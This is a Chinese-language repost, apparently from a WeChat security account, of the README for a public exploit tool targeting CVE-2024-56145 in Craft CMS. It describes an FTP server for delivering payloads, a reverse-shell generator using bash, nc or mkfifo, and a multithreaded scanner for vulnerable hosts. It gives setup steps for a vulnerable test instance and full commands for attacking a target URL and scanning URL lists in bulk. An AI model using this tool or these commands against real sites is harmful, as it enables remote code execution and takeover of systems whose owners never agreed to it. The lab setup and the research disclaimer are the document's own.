🙏 特别感谢 Assetnote 团队在安全领域的贡献与研究。
✨ 功能特点
-
🚀 自动化 FTP 服务器用于投放恶意载荷 -
🧪 反向 Shell 载荷生成器,支持多种方式( bash
、nc
、mkfifo
) -
🔍 漏洞检测器用于识别易受攻击的目标 -
🖥️ 多线程支持实现更快扫描 -
🛠️ 简单易用的命令行界面,反馈清晰明了
🛡️ 搭建测试环境
按以下步骤搭建 Craft CMS 测试实例:
mkdir exploit-craft &&
cd exploit-craft &&
# 配置用于 Craft CMS 的 DDEV 项目
ddev config
--project-type=craftcms
--docroot=web
--create-docroot
--php-version="8.2"
--database="mysql:8.0"
--nodejs-version="20" &&
# 创建 DDEV 项目
ddev start -y &&
# 使用指定版本创建 Craft CMS
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" &&
# 安装特定版本的 CMS
ddev composer require "craftcms/cms:5.5.0"
--no-scripts
--no-interaction --with-all-dependencies &&
# 设置 Craft CMS 安全密钥
ddev craft setup/security-key &&
# 安装 Craft CMS
ddev craft install/craft
--username=admin
--password=password123
[email protected]
--site-name=Testsite
--language=en
--site-url='$DDEV_PRIMARY_URL' &&
# 为 PHP 启用 register_argc_argv
mkdir -p .ddev/php/ &&
echo "register_argc_argv = On" > .ddev/php/php.ini &&
ddev restart &&
# 最后一步,输出提示信息并启动项目
echo '准备就绪!' &&
ddev launch
🚨 使用方法
使用 --help
参数查看可用命令:
python exploit.py --help
🚀 漏洞利用命令
攻击目标:
python exploit.py exploit -u <目标URL> -lh <本地主机> -lp <本地端口> -px <载荷类型>
⚙️ 参数说明:
-
-u
/--url
:目标网址(必填) -
-lh
/--lhost
:用于接收反向 Shell 的本地 IP(必填) -
-lp
/--lport
:监听器端口(必填) -
-fh
/--ftp-host
:FTP 服务器主机 -
-fp
/--ftp-port
:FTP 服务器端口 -
-px
/--payload
:载荷类型(bash
、nc
、mkfifo
),默认:bash
🧪 示例:
python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash
🔍 检查命令
检查目标是否存在漏洞:
python exploit.py check -u <目标URL> -f <URL列表文件> -t <线程数> -o <输出文件>
⚙️ 参数说明:
-
-u
/--url
:单个目标 URL -
-f
/--file
:包含多个待扫描 URL 的文件 -
-t
/--threads
:扫描并发线程数 -
-o
/--output
:保存结果的输出文件
🧪 示例:
python exploit.py check -f urls.txt -t 10 -o results.txt
下载
https://github.com/Chocapikk/CVE-2024-56145
原文始发于微信公众号(独眼情报):CVE-2024-56145:Craft CMS 漏洞利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论